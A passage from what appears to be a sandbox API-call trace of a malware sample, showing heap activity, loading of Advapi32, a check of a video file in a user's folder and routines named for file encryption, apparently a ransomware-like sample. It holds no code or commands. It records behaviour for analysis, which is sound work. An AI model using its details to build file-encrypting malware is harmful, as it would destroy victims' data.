lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0192.912] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0192.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.913] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.914] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0192.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0192.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.915] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0192.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0192.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.915] CloseHandle (hObject=0x160) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0192.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0192.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.916] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.916] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0192.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.917] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.917] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0192.917] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.917] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0192.917] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0192.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.917] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.917] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.917] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc22a3ef0, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xa9d8a260, ftLastAccessTime.dwHighDateTime=0x1d5daaa, ftLastWriteTime.dwLowDateTime=0xa9d8a260, ftLastWriteTime.dwHighDateTime=0x1d5daaa, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cWKRu.avi", cAlternateFileName="")) returned 0x90add8 [0192.918] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.918] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc22a3ef0, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xa9d8a260, ftLastAccessTime.dwHighDateTime=0x1d5daaa, ftLastWriteTime.dwLowDateTime=0xa9d8a260, ftLastWriteTime.dwHighDateTime=0x1d5daaa, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cWKRu.avi", cAlternateFileName="")) returned 0x90add8 [0192.918] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.918] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cWKRu.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.920] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.920] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0192.920] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.920] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.920] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.920] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.920] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.920] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.920] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.920] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc22a3ef0, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xa9d8a260, ftLastAccessTime.dwHighDateTime=0x1d5daaa, ftLastWriteTime.dwLowDateTime=0xa9d8a260, ftLastWriteTime.dwHighDateTime=0x1d5daaa, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="cWKRu.avi", cAlternateFileName="")) returned 0x90ae18 [0192.921] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.921] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.921] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.921] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.921] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.921] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.921] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.921] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0192.921] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.921] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.921] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0192.922] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.922] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.922] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.922] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.922] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0192.922] 